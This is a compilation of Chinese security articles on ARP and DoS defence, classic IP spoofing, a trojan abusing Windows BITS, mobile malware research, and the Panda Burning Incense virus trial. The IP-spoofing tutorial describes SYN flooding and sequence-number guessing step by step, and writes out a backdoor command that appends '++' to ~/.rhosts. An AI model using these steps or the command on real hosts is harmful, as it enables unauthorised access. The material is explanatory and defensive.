假期早准备 小措施防范来自网络的ARP攻击

假期早准备　小措施防范来自网络的ARP攻击

来源：赛迪网 作者：张健清

每年十一长假，都是一个愉快而繁忙的节日。尤其是节前，大家的心早都飞向了大自然，但是，节前的各项工作也是异常繁忙。当然还有服务行业，节日期间生意更是红火，比如说网吧和酒店。

假期期间网吧的生意繁忙，是赚钱的好时机。几个营业天，可能抵得上一个月的收入，也算得上是网吧老板的黄金周热门时段。但是，忙中有乱，也会有一些不良企图的人，利用网络攻击影响竞争者网吧，希望把客人带到自己的网吧来。

从Qno侠诺技术服务的近期统计发现，近来最常见的攻击仍是ARP及DoS。网络管理人员如能够了解这两种常见攻击的现象及预防之道，在长假期间如果遭遇到相关情况，会比较迅速地进行处理。

为确保网络安全，节前提早准备好应对措施，是认真工作好网管的必做工作之一。本文将一一向读者介绍针对最新ARP、DoS攻击而进行的防范措施，帮助认真工作的网管员，安心度过黄金周。

一、 “双向绑定”轻松应对ARP攻击

简单的ARP攻击是伪装成网关IP，转发讯息，盗取用户名及密码之用，不会造成掉线。这种ARP攻击，只会造成封包的遗失，或是Ping值提高，并不会造成严重的掉线或是大范围掉线。

这种ARP攻击的防范方式是以ARP ECHO指令方式应对，可以解决只是为了盗宝为目的传统ARP攻击。对于整体网络不会有影响。互联网上可以很容易找到相关的信息。

在ARP ECHO的解决方法提出后，ARP攻击开始进行演化。新的ARP攻击方式，使用更高频率的ARP ECHO，压过用户的ARP ECHO广播。由于发出广播包的次数太多，因此会使整个局域网变慢，或占用网关运算能力，发生内网很慢或上网卡的现象。如果严重时，通常就发生瞬断或全网掉线的情况。

对付这种较严重的ARP攻击，近来有不同解决方法提出，例如从路由器下载某个imf文件，更改网络堆栈，但效果有限。有些解决方式则在用户与网关间建立PPPoE联机，则配置功夫大又耗费运算能力。到现在为止最简单有效的方法仍属于Qno侠诺工程师2006年10月提出的“双向绑定方式”，可以有效地缩小影响层面。不过，不同的方法大致都可以防制ARP攻击。

此外，内网IP欺骗是在ARP攻击另一个变型攻击方式。攻击计算机会伪装成一样的IP，让受攻击的计算机产生IP冲突，无法上网。这种攻击，往往影响的计算机有限，而不是大规模影响。

内网IP欺骗采用双向绑定方式，可以有效解决。先作好绑定配置的计算机，不会受到后来的伪装计算机的影响。因此，等于一次因应ARP及内网IP欺骗解决。若是采用其它的ARP防制方法，则要采用另行的方法应对。

二、“动态智能带宽管理”防范DoS攻击

DoS攻击是从发出大量网络包，占用内网带宽或是路由器运算能力来进行攻击。

当网管发现内网很慢，Ping路由掉包，不知是那一台影响时，通常就是受到DoS攻击。很多内网攻击的原因经常是用户安装了外挂软件，变成发出攻击的计算机。有的内网攻击会自行变换IP，让网管更难找出是谁发出的网络包。

Qno侠诺提出内网攻击的解决方案，是从路由器判别，阻断发出网络包计算机的上网能力。因此用户会发现如果用攻击程序测试，立刻就发生掉线的情况，这就是因为被路由器认定为发出攻击计算机，自动被切断所致。正确的测试方法是用两台测试，一台发出攻击包给路由器，另一台看是否能上网。对于内网攻击，另外的解决之道是采用联防的交换机，直接把不正常计算机的实体联机切断，不过具联防能力交换器的成本较高，有时比路由器还要贵。

DoS的另外一种形式是外网攻击。外网攻击是从外部来的攻击，通常发生在使用固定IP的用户。很多网吧因为使用固定IP的光纤，经常成为外网攻击的目标。同时又因为外网攻击常常持续变换IP，也不容易加以阻绝或追查。它的现象是看内网流量很正常，但是上网很慢或上不了；观看路由器的广域网流量，则发现下载的流量被占满，造成宽带接入不顺畅。

外网流量攻击，可以用联机数加以辅助判断，但是不容易解决。有些地区可以要求ISP更换IP，但经常是几天后攻击又来了。有些用户搭配多条动态IP拨接的ADSL备援，动态IP就较不易成为攻击的目标。外网流量攻击属于犯法行为，可通知ISP配合执法单位追查，但现在看起来效果并不大。Qno侠诺也曾呼御有关主管单位加以重视，但并没有较好的响应。这现在是最难处理的攻击。

Qno侠诺推出的SmartQoS功能，就是一个针对前述的需求而研发的新功能。“动态智能QoS”主要配置参数为整体对外带宽大小及单一用户最多可占用带宽大小，路由器就可进行动态的智能管理，突发的带宽需要会被允许，只有真的持续占用带宽的用户会被限制，同时又能提高路由器效能。

虽然配置简单，但“动态智能带宽管理”结合了联机数限制、SPI包检测、二次惩罚机制等多种先进技术来完成。其中二次惩罚机制也为Qno侠诺首先提出的概念，它容许内网用户短期间占用大带宽，但是若是持续占用，路由器会不断缩小其可使用的带宽，直至无法上网为止。这个机制对于新式攻击软件，可以起到有效管制的作用。

三、小结

以上ARP及DoS是现今常见的网吧攻击，仅供网吧技术网管参考。此外，其实很多企业也会遇到类似的攻击，企业网管也需要掌握相关的防范手段，未雨绸缪！安心度过十一长假，让领导放心，让自己省心！


黑客通过IP欺骗进行攻击的原理及预防

本文的目的在于向读者解释IP 欺骗的实现方法和预防措施。它要求您掌握有关Unix 和TCP/IP 的少量知识。如果您没有，也没有关系，相信下面的说明能给您以足够的背景知识。

IP欺骗是适用于TCP/IP环境的一种复杂的技术攻击，它由若干部分组成。目前，在Internet领域中，它成为黑客攻击时采用的一种重要手段，因此有必要充分了解它的工作原理和防范措施，以充分保护自己的合法权益。

实际上，IP 欺骗不是进攻的结果，而是进攻的手段。进攻实际上是信任关系的破坏。然而，在本文中，IP 欺骗将被看作是涉及到的整个攻击，对于利用IP欺骗建立起来的虚假信任关系进行破坏的其它行为不作为我们讨论的内容。本文将详尽地解释攻击的全过程，包括有关的操作系统与网络信息。

背景知识

有关主机定义

A：目标主机

B：对于A来说，可信任的主机

X：不能到达的主机

Z：进攻主机

1（2）：主机1化装成主机2

图示符号定义

本文中有若干图示，它们将类比以下示例进行解释：

时间序列 主机a 控制 主机b

1 A －－SYN －－＞ B

时间序列：时间流逝的单位，可以无穷细化。一般认为是很小的单位，表示事件发生的先后顺序。

主机a：参与一次TCP 对话的机器。

控制：显示有关TCP控制字段头部的控制字符和该字段的流动方向。

主机b：参与一次TCP 对话的机器。

这个图示中，在第一参考时间点上主机A发送TCP 字段给主机B，控制字段中的SYN控制位将作为该TCP字段的主要信息。除非特别说明，我们一般不关心TCP 字段中的数据部分。

信任关系

在Unix 领域中，信任关系能够很容易得到。假如您在主机A和B上各有一个帐户，您在使用当中发现，在主机A上使用时需要输入在A上的相应帐户，在主机B上使用时必须输入在B上的帐户，主机A和B把您当作两个互不相关的用户，显然有些不便。为了减少这种不便，您可以在主机A和主机B中建立起两个帐户的相互信任关系。在主机A和主机B上您的home目录中创建.rhosts 文件。从主机A上，在您的home目录中输入'echo " B username " ＞ ～/.rhosts' ；从主机B上，在您的home目录中输入'echo " A username " ＞～/.rhosts' 。至此，您能毫无阻碍地使用任何以r＊开头的远程调用命令,如：rlogin，rcall，rsh等，而无口令验证的烦恼。这些命令将允许以地址为基础的验证，或者允许或者拒绝以IP地址为基础的存取服务。

Rlogin

Rlogin 是一个简单的客户/服务器程序，它利用TCP传输。Rlogin 允许用户从一台主机登录到另一台主机上，并且，如果目标主机信任它，Rlogin 将允许在不应答口令的情况下使用目标主机上的资源。安全验证完全是基于源主机的IP 地址。因此，根据以上所举的例子，我们能利用Rlogin 来从B远程登录到A，而且不会被提示输入口令。

Internet协议（IP）

IP 是TCP/IP协议组中非面向连接、非可靠传输的网络协议。它由两个32bit的头字段提供地址信息。IP数据包占TCP/IP协议网络流量中的很大部分，可以说是最为繁忙的部分。IP 的工作在于在网络环境中发送数据包，它不提供保证可靠性的任何机制，对于可靠性的要求，由上层协议来完成。IP只是发送数据包，并且保证它的完整性。如果不能收到完整的IP数据包，IP会向源地址发送一个ICMP 错误信息，希望重新处理。然而这个包也可能丢失(ICMP 是网际控制消息协议，Internet Control Message Protocol，它是用于根据网络条件保证数据传送的协议，主要是向IP层或其它层发送不同的错误信息）。由于IP是非面向连接的，所以不保持任何连接状态的信息。每个IP数据包被松散地发送出去，而不关心前一个和后一个数据包的情况。由此我们不难看出，可以对IP堆栈进行修改，在源地址和目的地址中放入任意满足要求的IP地址，也就是说，提供虚假的IP地址。

传输控制协议（TCP）

TCP 是在TCP/IP协议组中面向连接、提供可靠传输的协议。面向连接意味着参与对话的两个主机必须首先建立起连接，然后才能进行数据交换。可靠性是由数据包中的多位控制字来提供的，但是，其中仅仅有两个是与我们的讨论有关。它们是数据序列和数据确认，分别用SYN和ACK来表示。TCP 向每一个数据字节分配一个序列号，并且可以向已成功接收的、源地址所发送的数据包表示确认（目的地址ACK 所确认的数据包序列是源地址的数据包序列，而不是自己发送的数据包序列）。ACK在确认的同时，还携带了下一个期望获得的数据序列号。显然，TCP提供的这种可靠性相对于IP来说更难于愚弄。

序列编号、确认和其它标志信息

由于TCP是基于可靠性的，它能够提供处理数据包丢失，重复或是顺序紊乱等不良情况的机制。实际上，通过向所传送出的所有字节分配序列编号，并且期待接收端对发送端所发出的数据提供收讫确认，TCP 就能保证可靠的传送。接收端利用序列号确保数据的先后顺序，除去重复的数据包。TCP 序列编号可以看作是32位的计数器。它们从0至232－1 排列。每一个TCP连接（由一定的标示位来表示）交换的数据都是顺序编号的。在TCP数据包中定义序列号（SYN）的标示位位于数据段的前端。确认位（ACK）对所接收的数据进行确认，并且指出下一个期待接收的数据序列号。

TCP通过滑动窗口的概念来进行流量控制。设想在发送端发送数据的速度很快而接收端接收速度却很慢的情况下，为了保证数据不丢失，显然需要进行流量控制，协调好通信双方的工作节奏。所谓滑动窗口，可以理解成接收端所能提供的缓冲区大小。TCP利用一个滑动的窗口来告诉发送端对它所发送的数据能提供多大的缓冲区。由于窗口由16位BIT所定义，所以接收端TCP 能最大提供65535个字节的缓冲。由此，可以利用窗口大小和第一个数据的序列号计算出最大可接收的数据序列号。

其它TCP标示位有RST（连接复位，Reset the connection）、PSH（压入功能，Push function）和FIN （发送者无数据，No more data from sender）。如果RST 被接收，TCP连接将立即断开。RST 通常在接收端接收到一个与当前连接不相关的数据包时被发送。有些时候，TCP模块需要立即传送数据而不能等整段都充满时再传。一个高层的进程将会触发在TCP头部的PSH标示，并且告诉TCP模块立即将所有排列好的数据发给数据接收端。FIN 表示一个应用连接结束。当接收端接收到FIN时，确认它，认为将接收不到任何数据了。

TCP连接的建立

为了利用TCP 连接交换数据，主机间首先必须建立一个连接。TCP 建立连接时可以分为3个步骤，称为三步握手法。如果主机A运行rlogin客户程序，并且希望连接到主机B上的 rlogin daemon服务器程序上，连接过程如图1所示。

1 A －－－SYN－－－> B

2 A ＜－－SYN/ACK－－ B

3 A －－－ACK－－－＞ B

　　图1

需要提醒读者的是，主机A和B的TCP模块分别使用自己的序列编号。在时刻1时，客户端通过设置标志位SYN=1告诉服务器它需要建立连接。同时，客户端在其TCP头中的序列号领域SEQ放置了它的初始序列号（ISN），并且告诉服务器序列号标示域是有效的，应该被检查。在时刻2时，服务器端在接收了上面的SYN后，作出的反应是将自己的ISN 和对客户端的ACK发向客户端并且告知下一个期待获得的数据序列号是（ISN＋1）。客户端在第3时刻，对服务器的ISN进行确认。这时，数据传输就可以进行了。

ISN与序列号的递增

了解序数编号如何选择初始序列号和如何根据时间变化是很重要的。似乎应该有这种情况，当主机启动后序列编号初始化为1，但实际上并非如此。初始序列号是由tcp_init函数确定的。ISN每秒增加128000，如果有连接出现，每次连接将把计数器的数值增加64000。很显然，这使得用于表示ISN的32位计数器在没有连接的情况下每9.32 小时复位一次。之所以这样，是因为这样有利于最大限度地减少旧有连接的信息干扰当前连接的机会。这里运用了2MSL 等待时间的概念（不在本文讨论的范围之内）。如果初始序列号是随意选择的，那么不能保证现有序列号是不同于先前的。假设有这样一种情况，在一个路由回路中的数据包最终跳出了循环，回到了“旧有”的连接（此时其实是不同于前者的现有连接），显然会发生对现有连接的干扰。

端口号

为了提供对TCP 模块的并行访问，TCP 提供了叫做端口的用户接口。端口被操作系统内核利用来标示不同的网络进程，也就是严格区分传输层入口的标示（就是说，IP 不关心他们的存在）。TCP端口与IP 地址一起提供网络端到端的通信。事实上，在任何时刻任何Internet连接都能由4个要素来描述：源IP 地址、源地址端口号、目的IP 地址和目的地址端口号。服务器程序一般被绑定在标准的端口号上。例如， rlogin daemon被绑定在TCP 513端口。

IP欺骗

IP欺骗由若干步骤组成，这里先简要地描述一下，随后再做详尽地解释。先做以下假定：首先，目标主机已经选定。其次，信任模式已被发现，并找到了一个被目标主机信任的主机。黑客为了进行IP欺骗，进行以下工作：使得被信任的主机丧失工作能力，同时采样目标主机发出的TCP 序列号，猜测出它的数据序列号。然后，伪装成被信任的主机，同时建立起与目标主机基于地址验证的应用连接。如果成功，黑客可以使用一种简单的命令放置一个系统后门，以进行非授权操作。

IP欺骗是一种不光彩的进攻

一个经常被忽略，但却是非常关键的事实就是IP欺骗是不光彩的进攻。进攻者将取代真正被信任的主机，从而破坏目标主机的安全体系。黑客常常利用如下所描述的方法使得真正被信任的主机丧失工作能力。安全防范程度不高的主机在它正在和一个可以信赖的主机通信时，处于Internet某个阴暗角落的一个攻击者实际上是可以使真正被信任的主机处于停顿状态，而自己大量模仿它的数据包，将之发向目标主机。可悲的是目标主机全然没有感觉。由攻击者模仿的TCP数据包到达了目标地址，而由目标地址发往真正被信任主机的TCP数据包却永远到达不了攻击者的主机（两者的真实IP地址不同）。当然，一旦目标地址发送的TCP数据包到达了真正被信任的主机时，信息虽然进入协议堆栈，到达TCP处理模块，但是会被取消。所以，攻击者需要知道目标主机发送了什么，期待什么样的反应。攻击者虽然不能看到目标主机发送的内容，但是它能预料到将发送的内容。围绕着这些内容，攻击者将展开它不光彩的进攻。

信任模式

在选择好进攻目标后，黑客需要确定该主机的信任模式。为了讨论起见，我们假设目标主机确实信任某个主机。找出某个主机信任谁或不信任谁是不容易的。 ′showmount e′可以显示出文件系统在哪里被export，同时′rpcinfo′ 也能提供有价值的信息。如果得到目标主机的足够背景信息，进行攻击是不会太困难的。如果所有尝试都失败了，黑客会尝试相邻的IP地址，以获取有价值的信息。

使被信任主机丧失工作能力

一旦发现被信任的主机，为了伪装成它，往往使其丧失工作能力。由于攻击者将要代替真正的被信任主机，他必须确保真正被信任的主机不能接收到任何有效的网络数据，否则将会被揭穿。有许多方法可以做到这些。在此，笔者只讨论一种方法，即“TCP SYN 淹没”。前面已经谈到，建立TCP连接的第一步就是客户端向服务器发送SYN请求。 通常，服务器将向客户端发送SYN/ACK 信号。这里客户端是由IP地址确定的。客户端随后向服务器发送ACK（见图1），然后数据传输就可以进行了。然而，TCP处理模块有一个处理并行SYN请求的最上限，它可以看作是存放多条连接的队列长度。其中，连接数目包括了那些三步握手法没有最终完成的连接，也包括了那些已成功完成握手，但还没有被应用程序所调用的连接。如果达到队列的最上限，TCP将拒绝所有连接请求，直至处理了部分连接链路。因此，这里是有机可乘的。黑客往往向被进攻目标的TCP端口发送大量SYN请求，这些请求的源地址是使用一个合法的但是虚假的IP地址（可能使用该合法IP地址的主机没有开机）。而受攻击的主机往往是会向该IP地址发送响应的，但可惜是杳无音信。与此同时IP包会通知受攻击主机的TCP：该主机不可到达，但不幸的是TCP会认为是一种暂时错误，并继续尝试连接（比如继续对该IP地址进行路由，发出SYN/ACK数据包等等），直至确信无法连接。当然，这时已流逝了大量的宝贵时间。值得注意的是，黑客们是不会使用那些正在工作的IP地址的，因为这样一来，真正IP持有者会收到SYN/ACK响应，而随之发送RST给受攻击主机，从而断开连接。前面所描述的过程可以表示为图2的模式。

1 Z （X） －－－SYN －－－> B

　 　 Z （X） －－－SYN －－－＞ B

　 　 Z （X） －－－SYN －－－＞ B

......

2 X ＜－－－SYN/ACK－－ B

X ＜－－－SYN/ACK－－ B

......

3 X ＜－－－ RST －－－ B

　　图2

在时刻1时，攻击主机把大批SYN 请求发送到受攻击目标（在此阶段，是那个被信任的主机），使其TCP队列充满。在时刻2时，受攻击目标向它所相信的IP地址（虚假的IP）作出SYN/ACK反应。在这一期间，受攻击主机的TCP模块会对所有新的请求予以忽视。不同的TCP 保持连接队列的长度是有所不同的。BSD 一般是5，Linux一般是6。使被信任主机失去处理新连接的能力，所赢得的宝贵空隙时间就是黑客进行攻击目标主机的时间，这使其伪装成被信任主机成为可能。

序列号取样和猜测

前面已经提到，要对目标主机进行攻击，必须知道目标主机使用的数据包序列号。现在，我们来讨论黑客是如何进行预测的。他们先与被攻击主机的一个端口（SMTP是一个很好的选择）建立起正常的连接。通常，这个过程被重复若干次，并将目标主机最后所发送的ISN存储起来。黑客还需要估计他的主机与被信任主机之间的RTT时间（往返时间），这个RTT时间是通过多次统计平均求出的。RTT 对于估计下一个ISN是非常重要的。前面已经提到每秒钟ISN增加128000，每次连接增加64000。现在就不难估计出ISN的大小了，它是128000乘以RTT的一半，如果此时目标主机刚刚建立过一个连接，那么再加上一个64000。再估计出ISN大小后，立即就开始进行攻击。当黑客的虚假TCP数据包进入目标主机时，根据估计的准确度不同，会发生不同的情况：

·如果估计的序列号是准确的，进入的数据将被放置在接收缓冲器以供使用。

·如果估计的序列号小于期待的数字，那么将被放弃。

·如果估计的序列号大于期待的数字，并且在滑动窗口（前面讲的缓冲）之内，那么，该数据被认为是一个未来的数据，TCP模块将等待其它缺少的数据。如果估计的序列号大于期待的数字，并且不在滑动窗口（前面讲的缓冲）之内，那么，TCP将会放弃该数据并返回一个期望获得的数据序列号。下面将要提到，黑客的主机并不能收到返回的数据序列号。

破坏行为......

图3是攻击的全过程。

1 Z（B） ——－－SYN －－－> A

2 B ＜－－－SYN/ACK－－－ A

3 Z（B） ——－－－ACK－－－＞ A

4 Z（B） －－－——PSH－－－＞ A

......

图3

攻击者伪装成被信任主机的IP 地址，此时，该主机仍然处在停顿状态（前面讲的丧失处理能力），然后向目标主机的513端口(rlogin的端口号)发送连接请求，如时刻1所示。在时刻2，目标主机对连接请求作出反应，发送SYN/ACK数据包给被信任主机（如果被信任主机处于正常工作状态，那么会认为是错误并立即向目标主机返回RST数据包，但此时它处于停顿状态）。按照计划，被信任主机会抛弃该SYN/ACK数据包。然后在时刻3，攻击者向目标主机发送ACK数据包，该ACK使用前面估计的序列号加1（因为是在确认）。如果攻击者估计正确的话，目标主机将会接收该ACK 。至此，连接正式建立起来了。在时刻4，将开始数据传输。一般地，攻击者将在系统中放置一个后门，以便侵入。经常会使用 ′cat ＋＋ >> ～/.rhosts′。之所以这样是因为，这个办法迅速、简单地为下一次侵入铺平了道路。

工作原理分析

IP欺骗之所以可以成功是因为信任服务的基础仅仅是建立在网络地址的验证上。IP地址是容易被伪造的。攻击过程最难的部分是进行序列号估计，估计精度的高低是成功与否的关键所在。

预防措施

抛弃基于地址的信任策略

阻止这类攻击的一种非常容易的办法就是放弃以地址为基础的验证。不允许r＊类远程调用命令的使用；删除.rhosts 文件；清空/etc/hosts.equiv 文件。这将迫使所有用户使用其它远程通信手段，如telnet、ssh、skey等等。

进行包过滤

如果您的网络是通过路由器接入Internet 的，那么可以利用您的路由器来进行包过滤。确信只有您的内部LAN可以使用信任关系，而内部LAN上的主机对于LAN以外的主机要慎重处理。您的路由器可以帮助您过滤掉所有来自于外部而希望与内部建立连接的请求。

使用加密方法

阻止IP欺骗的另一种明显的方法是在通信时要求加密传输和验证。当有多种手段并存时，可能加密方法最为适用。

使用随机化的初始序列号

黑客攻击得以成功实现的一个很重要的因素就是，序列号不是随机选择的或者随机增加的。Bellovin 描述了一种弥补TCP不足的方法，就是分割序列号空间。每一个连接将有自己独立的序列号空间。序列号将仍然按照以前的方式增加，但是在这些序列号空间中没有明显的关系。可以通过下列公式来说明：

ISN =M＋F（localhost，localport ，remotehost ，remoteport ）

M：4微秒定时器

F：加密HASH函数。

F产生的序列号，对于外部来说是不应该能够被计算出或者被猜测出的。Bellovin 建议F是一个结合连接标识符和特殊矢量（随机数，基于启动时间的密码）的HASH函数。

技巧：让Windows更新对恶意软件说“不”

技巧：让Windows更新对恶意软件说“不”

来源：赛迪网 作者：freedom

如果您是一位Windows的用户，就需要注意到微软网站上看一下，您就会发现评述一个称为Win32/Jowspry的恶意程序的报告。这个恶意程序利用了Windows的自动更新服务将文件下载到用户的计算机上，对用户的计算机系统大肆进行破坏。当然，你可能会想到，一个理智的做法是停止使用Windows的更新服务，这可以防止恶意软件的安装。虽然“防守是最好的攻击。”但如何保障一台Windows计算机在更新时免受新的安全威胁呢？

任何问题总有解决的办法。我们知道，计算机系统要与Windows的更新站点进行交互，就必须使用后台智能传输服务，即所谓的BITS。BITS利用用户系统未用的带宽来下载补丁和更新文档。它还使得Windows服务器更新服务、系统管理服务器以及微软的即时通信产品的文件传输更加容易。在许多系统中包含BITS功能，如Windows XP Service Pack 1、Windows 2000 Service Pack 3以及现在最新的Windows操作系统。

我们发现，作为当前操作系统（如Windows XP和Windows Vista等）一部分的Windows防火墙允许BITS发送和接收来自互联网的数据，却不会激发任何警告。也就是说不会弹出类似如下的窗口：



很显明，通过劫持这种服务，在试图利用Windows漏洞时，恶意软件的作者能够快速地绕过其主要的障碍。绕过防火墙的过滤器能够在无需警告用户的情况下实现恶意文件的安装。即使用户采用了基于网络的防火墙，并尽力区分BITS可以下载的数据和绝对不能下载的数据。BITS活动的低带宽消耗和异步传输特性也会使得防火墙难于检测任何恶意活动。

事实上，这种攻击并不是由Windows更新的缺陷引起的。任何攻击者都没有也不可能将恶意文件上传到微软的网站上用于BITS下载。要让攻击工作，用户必须先下载Win32/Jowspry并执行它。也只有这样这种特洛伊木马程序才能BITS安装额外的恶意软件。想要恶意地使用BITS，特洛伊木马程序需要存在于用户计算机上。BITS并非最初感染的攻击源。一旦将自身安装到计算机上，恶意软件就用这样一种机制绕过防火墙技术。

我们权且将这种攻击称之为Windows更新攻击，迎战这种攻击的最佳方法在于在公司的用户中增强防范意识，教育他们如何处理来自未知或意外的源站点的信息（包括链接和文档、程序等）。这就会减少用户下载Jowspry或其它能够感染计算机的恶意程序的机会。一些安全专家建议将BITS限制为只能给经核准的或可信任的站点或链接。然而，许多第三方的软件厂商用它来发布软件更新，这种限制就会引起不少麻烦，你需要仔细维护经认可的站点，需要筹划该将哪些站点列入优良者名单。

虽然这种攻击只不过是众多攻击中的小菜一碟，不过却向我们展示了各种攻击日益增加的复杂性和惊人的发展速度，并可以帮助我们深入理解Windows操作系统本身。

移动设备上的恶意软件：威胁及预防的研究

来源：赛迪网 作者：杜莉 译

McAfee发布了有关有可能被黑客攻击的、基于Windows Mobile（微软操作系统）的智能手机的7个方面的研究结果。在《移动恶意软件：威胁与预防》白皮书中，McAfee Avert实验室的研究人员讨论了例如手机内容的泄露以及将手机变成远程监视设备等威胁。研究人员们还给用户提供了些减少他们被攻击的风险的窍门。

“带个智能手机就像装了台计算机在自己口袋里，”McAfee Avert实验室和产品开发的高级副总和Jeff Green说。“享受了它的强大功能和便捷性也要付出代价的。这些智能手机跟我们的台式机和笔记本一样面临安全威胁。”

Avert实验室预测，随着智能手机价格降低、并且使用越来越广泛，将来针对智能手机的恶意软件会持续增多。据Avert实验室称，针对Windows Mobile操作系统的威胁将显著增加，因为它当前的设计为恶意软件编撰者留下了机会。

在针对微软Windows Mobile的研究中，Avert实验室发现了无意识泄露设备信息的威胁，比如文本信息、电子邮件、文档、通话记录以及通讯录等等。攻击者能够监控用户的通话或者使用某种基于Windows Mobile手机作为远程监控设备，监视包括声音、图片和视频。

但是，根据Avert实验室的研究，我们应当立即提高警惕。尽管当今的移动恶意软件并不存在非常严重的风险。“现在我们还处在长期趋势的开端。我们不能放松警惕，”Avert Labs的研究科学家以及白皮书的作者之一的朱成说。“在使用智能手机的时候一定要提高警惕。”

网络公司欲百万年薪聘用熊猫烧香案主犯

长江商报



熊猫烧香案在仙桃市法院公开审理，李俊、王磊、张顺、雷磊四人出庭受审

昨日，备受社会关注的“熊猫烧香”案在仙桃市法院一审宣判。李俊、王磊、张顺、雷磊4人破坏计算机信息系统罪名成立，依法判处李俊4年有期徒刑、王磊2年半有期徒刑、张顺2年有期徒刑、雷磊1年有期徒刑。

　　由于控方联系到的个人用户仅有800余户，李俊仅属于“后果严重”而非之前媒体报道的“后果特别严重”，终获轻刑。

　　当日，主犯李俊当庭向全国网民道歉，“制造熊猫烧香病毒完全是出于爱好，没想到给社会造成了如此大的危害，在这里我给全国受害网民说声对不起。”

　　庭审现场 一案犯鞠躬道歉

　　昨日上午8时30分许，法警将李俊等4人带进法庭。李俊第一个走进法庭，短短的头发，精神有些萎靡。随后，被带进来的是王磊、张顺、雷磊三人。王磊和张顺刚走进法庭，头朝着旁听席笑了笑，然后静静地走向被告席。整个庭审过程持续了三个半小时，四名被告对自己的犯罪事实均供认不讳。

　　中午12时许，庭审进入了最后阶段，主犯李俊首先作最后陈述。“制作熊猫烧香病毒，完全是因为爱好，没有想到在这么短的时间里给网络造成了这么大的危害。在这里，我向全国所有熊猫烧香病毒受害者和网友道歉。”李俊说，他对自己过去所犯的错误很后悔，并请法庭给他一次机会重新做人，将来为社会多作贡献。

　　“我对自己的行为非常后悔。一方面没学习法律知识，法律观念淡薄，另一方面，在必要的时候，没有及时制止李俊的行为。我向受害者深表歉意。”雷磊说，他希望广大网友一定要以他们为戒，在满足自己的求知欲和成功欲时，还应学习法律知识，遵纪守法，以自己的一技之长，自觉维护中国互联网安全，以此回报社会。

　　在法庭上，王磊面对法官深深地鞠躬，“我非常后悔，真诚向受害者说声对不起。”陈述中，张顺也对自己的行为表示后悔。

　　今年年初，李俊在看守所完成 “熊猫烧香”病毒专杀工具后，也曾写信向全国网民道歉。

　　案件内幕 传播病毒获利20余万元

　　昨日上午，仙桃市检察院江浩检察官作为公诉人出庭。检方指控： 2006年11月，李俊开始制作“熊猫烧香”。去年11月底，李俊完成“熊猫烧香”病毒源代码及测试成功，并通过送给网友等方式传播。李俊将“熊猫烧香”病毒源代码通过网上传播给雷磊，雷磊看后，提出该病毒不要修改别人的图标(被感染文件的图标)，同时，隐藏病毒进程。不过，他并没有告诉李俊具体修改方法。

　　2006年12月初，李俊通过QQ与王磊联系上后，由王磊出资1600元，租用南昌锋讯网络科技有限公司的服务器，架设到李俊的网站(www.krvkr.com)上。这样，中了“熊猫烧香”病毒的计算机，可以自动访问李俊的网站。随着病毒的传播，该网站的流量会不断增长，同时，李俊按雷磊建议，修改了“熊猫烧香”病毒。

　　2006年12月中旬，王磊介绍张顺购买李俊网站上的流量。李俊将张顺提供的盗号木马的自动下载链接到李俊的网站上。张顺将木马盗取的含账号和密码的大量网络游戏电子信封，以每个0.9元到2.5元的价格在网上出售，并多次给李俊和王磊汇款。在此期间，王磊在网上通过QQ传播病毒。当李俊卖出了3个“熊猫烧香”病毒后，三次共同汇给李俊1450元。据介绍，通过传播“熊猫烧香”病毒，李俊共获利14.549万元；王磊获利8万元；张顺获利1.2万元。

　　法院审理查明，由于“熊猫烧香”病毒的传播感染，影响了山西、河北、辽宁、广东、湖北、北京、上海、天津等省市的众多单位和个人的计算机系统的正常运行。2007年2月2日，李俊将其网站关闭，之后再未开启该网站。2007年2月4日、5日、7日，李俊、王磊、张顺、雷磊分别被仙桃市公安局抓获归案。李俊、王磊、张顺归案后退出所得全部赃款。李俊交出“熊猫烧香”病毒专杀工具。在看守所内，李俊还主动将这一病毒专杀工具进行完善。

　　罪行认定 4人犯破坏计算机信息系统罪

　　法院审理后认为，李俊、雷磊、王磊、张顺故意制造或传播计算机病毒，影响了众多计算机系统正常运行，后果严重，已构成破坏计算机信息系统罪。其中，李俊是主犯，王磊、张顺、雷磊是从犯。法庭念在4被告人认罪态度较好，有悔罪表现，李俊又有立功表现，且案发后李俊、王磊、张顺退出所得全部赃款，依法从轻判处，李俊有期徒刑4年，王磊有期徒刑2年半，张顺有期徒刑2年，雷磊有期徒刑1年。法庭并判决李俊、王磊、张顺的违法所得予以追缴，上缴国库。

　　家属反应

　　李俊母亲伤心落泪　张顺父亲欲上诉

　　昨日下午2时许，吃完午饭的李俊亲属齐聚在审判庭门口。而雷磊的妻子带着儿子静静等候法院宣判时刻的到来。雷磊妻子和记者交谈的过程中，脸上的神情看起来还比较轻松。

　　当审判长念完判决书后，李俊的母亲流泪了，李俊表姐搀着李俊母亲走出法庭。

　　张顺父亲张兆旺表示，法院对张顺的量刑过重。他将于近日上诉到中院。据了解，王磊的家属也认为量刑过重，表示要上诉到中院。

　　在庭审宣判后，李俊的辩护律师王万雄称，整个判决结果基本上在他预料之中。

　　事情进展

　　网络公司欲百万年薪邀请李俊

　　在昨日的庭审中，李俊的辩护律师王万雄出示了一份杭州某网络公司发给李俊的邀请函。

　　该网络公司在邀请函中称：“由于公司发展需要，现特邀您担任我公司技术总监。若您有意，望结束后与我们联系，就详情进行商谈。”

　　昨日下午，记者电话采访了杭州聚数科技有限公司经理董振国。董振国表示，想通过聘请李俊担任技术顾问，正确引导这个人才，给他创造良好的环境来充分发挥他的特长。

　　董振国还称，去年年底，他公司里的电脑也受到病毒攻击，造成了大量数据的丢失。他也非常痛恨李俊。不过，后来他从媒体报道中了解到，李俊并不坏，只是一时误入歧途。据了解，董振国通过当地派出所，将其邀请函转交到了李俊弟弟李明手中，并和李俊家人取得了联系。

　　据李俊辩护律师王万雄介绍，案发后，已有不下10家网络大公司跟李俊联系，欲以100万年薪邀请他加入。

　　王万雄律师说，李俊是我国不可多得的电脑人才，他现在已经积极悔改，希望发挥自己的特长，报效社会。

　　庭审辩论

　　【焦点一】主犯李俊是否有自首立功情节

　　昨日，在法庭上，控辩双方进行了激烈的争辩。法庭上，李俊的辩护律师王万雄认为，李俊主动交代犯罪事实。当李俊被抓时，当即承认其制作病毒事实。而且归案后，还主动交代雷磊居住地，应该将李俊的行为视为自首情节。

　　对于李俊的立功表现，王万雄律师认为，李俊被抓后，协助公安机关相继抓获雷磊和张顺。而且案发前，李俊意识到了熊猫烧香病毒的危害性，关闭了其和王磊两人联合租用的服务器，编写了“熊猫烧香”专杀工具。

